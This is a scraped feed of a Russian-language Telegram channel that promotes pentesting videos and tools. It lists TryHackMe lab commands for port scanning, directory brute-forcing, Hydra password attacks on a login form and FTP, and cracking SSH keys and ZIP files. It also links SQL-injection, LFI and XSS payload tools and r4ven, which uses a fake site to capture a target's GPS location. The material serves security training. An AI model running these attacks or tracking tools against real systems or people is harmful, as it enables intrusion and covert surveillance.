NetStalkers
8.07K subscribers
396 photos
28 videos
96 files
279 links
Информация в опасности!

— Софт
— Литература
— Новости

Сотрудничество: @web_runner
Download Telegram
⚡️ Практика по хакингу ⚡️
💰 Хочешь получить одну из самых востребованных профессий в IT?
🔥 Пентест, этичный хакинг и информационная безопасноть для новичков

☠️ Брутфорсим админ-панель, ломаем сайт и проникаем на Linux машину

🌵 Брутфорс формы аутентификации
🌵 Хакерский софт
🌵 Взлом хешей паролей
🌵 Мисконфиги и rsa ключи на сервере
🌵 Эскалация привилегий и многое другое

Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪

https://youtu.be/fndrrIUWJS4

#youtube
NetStalkers
⚡️ Практика по хакингу ⚡️ 💰 Хочешь получить одну из самых востребованных профессий в IT? 🔥 Пентест, этичный хакинг и информационная безопасноть для новичков ☠️ Брутфорсим админ-панель, ломаем сайт и проникаем на Linux машину 🌵 Брутфорс формы аутентификации…
🖥 Большой выбор бесплатных машин
https://tryhackme.com/

🔎 Nmap под разные ОС
https://nmap.org/download.html

🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch


😎 Команды из видео:

⌨️ Rustscan
$ rustscan -a ip_address
⌨️ Nmap
$ nmap -sC -sV ip_address
$ nmap -sC -sV -p22,80 ip_address
⌨️ Gobuster
$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --url ip_address -t 50
⌨️ Dirsearch
$ dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u 'http://site.com'
⌨️ Hydra
$ hydra -l john -P /usr/share/wordlists/rockyou.txt ip_address http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid." -V
⌨️ John
$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
⌨️ id_rsa SSH connect
$ ssh -i id_rsa user@ip_address
Forwarded from Caster (Magama Bazarov)
Media is too big
VIEW IN TELEGRAM
Запись стрима про Extreme Evil. (Атака Базарова)
🔥 Полезные библиотеки Python

Ghauri
- кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования SQL-инъекций.

Поддерживает работу с:
🌵 MySQL
🌵 Microsoft SQL Server
🌵 Postgre
🌵 Oracle

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub/Инструкция

#pentest #redteam #github #soft #python
⚡️ Практика Python ⚡️
🔥 Парсим группы в Telegram, VKontakte, Twitter и других соц.сетях

https://youtu.be/BNLOj20tOag

Команды из видео:
snscrape --max-results 10 vkontakte-user username > vk-@username.txt

snscrape --max-results 10 --jsonl vkontakte-user username > vk-@username_jsonl.txt

snscrape --max-results 10 --jsonl vkontakte-user group_name > vk-@group_name_jsonl.txt

snscrape --max-results 10 --jsonl telegram-channel channel_name > telegram-@channel_name_jsonl.txt

snscrape --max-results 10 --jsonl instagram-user username > instagram-@username_jsonl.txt

⚙️ GitHub модуля

#youtube
🔥 Полезные библиотеки Python

hash-identifier
- одна из самых популярных утилит сталкеров для определения различных типов хэшей, используемых для шифрования данных в особенности паролей.

⚙️ GitHub

#redteam #pentest #github #soft #python
🔥 Полезные библиотеки Python

Liffy
- утилита для эксплуатации LFI: локального включения файлов.

LFI - это подключение, выполнение или чтение локальных файлов на сервере, популярный и часто эксплуатируемый способ взлома сайтов и веб приложений.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub/Инструкция

#github #soft #python #pentest #redteam
⚡️ Большая практика по хакингу ⚡️
💰 Хочешь получить одну из самых востребованных профессий в IT?
🔥 Пентест, этичный хакинг и информационная безопасноть для новичков

☠️ Ломаем сайт и проникаем на сервер

🌵 Взлом приватных ключей и zip архива
🌵 Брутфорс ftp сервера
🌵 Python скрипты для шифрования и дешифровки
🌵 Хакерский софт
🌵 Взлом хешей паролей
🌵 Мисконфиги и rsa ключи на сервере
🌵 Эскалация привилегий и многое другое

Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪

https://youtu.be/tm3B6yYOJVw

#youtube
NetStalkers
⚡️ Большая практика по хакингу ⚡️ 💰 Хочешь получить одну из самых востребованных профессий в IT? 🔥 Пентест, этичный хакинг и информационная безопасноть для новичков ☠️ Ломаем сайт и проникаем на сервер 🌵 Взлом приватных ключей и zip архива 🌵 Брутфорс ftp…
🖥 Машина из видео
https://tryhackme.com/room/mnemonic

🖥 Большой выбор бесплатных машин
https://tryhackme.com/

🔎 Nmap под разные ОС
https://nmap.org/download.html

🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch

😎 Команды из видео:

⌨️ Rustscan
$ rustscan -a ip_address
⌨️ Nmap
$ nmap -sC -sV ip_address
$ nmap -sC -sV -p21,80,1337 ip_address
⌨️ Gobuster
$ gobuster dir -w /usr/share/dirb/wordlists/common.txt -t 50 -x php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx  -u ip_address
⌨️ fcrackzip
fcrackzip -D -p rockyou.txt -u backup.zip -v
⌨️ Hydra
$ hydra -l ftpuser -P rockyou.txt ftp://ip_address -V
⌨️ Wget
wget -r ftp://username:password@ipaddress/
⌨️ John
$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
⌨️ id_rsa SSH connect
$ ssh -i id_rsa user@ip_address -p 1337
⌨️ Pyhon скрипт из видео:
https://github.com/MustafaTanguner/Mnemonic
Forwarded from [PYTHON:TODAY]
🔥 Полезные библиотеки Python

XSS-LOADER TOOLS
- инструмент позволяет создавать полезную нагрузку для использования в xss-инъекциях.

Также имеет два модуля: один для обнаружения XSS уязвимостей, а другой - для Google Dorking.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub/Инструкция

#redteam #pentest #github #soft #python
💾 Bug-Bounty-Wordlists - репозиторий с множеством словарей под разные задачи для пентеста и баг-хантинга

⚙️ GitHub

#pentest #redteam #cybersec
SSH penetration testing sample by HackingArticles.pdf
2.1 MB
💾 SSH penetration testing sample

Полезная шпаргалка по взлому SSH. Всё от установки подключения, до генерации ключей, различных утилит для поиска и сканирования уязвимостей и взлома паролей Hydra

#redteam #pentest #ssh #doc
👨‍💻 Dark-Web-Osint-Tools - подборка инструментов для поиска, сканирования и анализа информации из доменной зоны .onion(темной стороны интернета)

⚙️ GitHub/Инструкция

#pentest #redteam #cybersec
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡️ Практика Python ⚡️
😎 Три программы для твоего портфолио на GitHub

https://youtu.be/4w4sSabOjl0

#youtube
r4ven - интересная и простая в использовании Python утилита позволяющая получит местоположение GPS (широту и долготу) цели вместе с IP-адресом и информацией об устройстве с помощью поддельного веб-сайта.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

💡 Статья/Инструкция

⚙️ GitHub

#python #soft #github #osint #cybersec
⚡️ Практика по хакингу ⚡️
🧑‍💻 Пентест и этичный хакинг для новичков

🔥 Ломаем сайт на WordPress

Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪

https://youtu.be/DLb9oTaX-AY

#youtube
Please open Telegram to view this post
VIEW IN TELEGRAM
Pentesting Web checklist.pdf
581.2 KB
💾 Хороший чек-лист по пентесту Web приложений

#doc #cheatsheet #pentest #redteam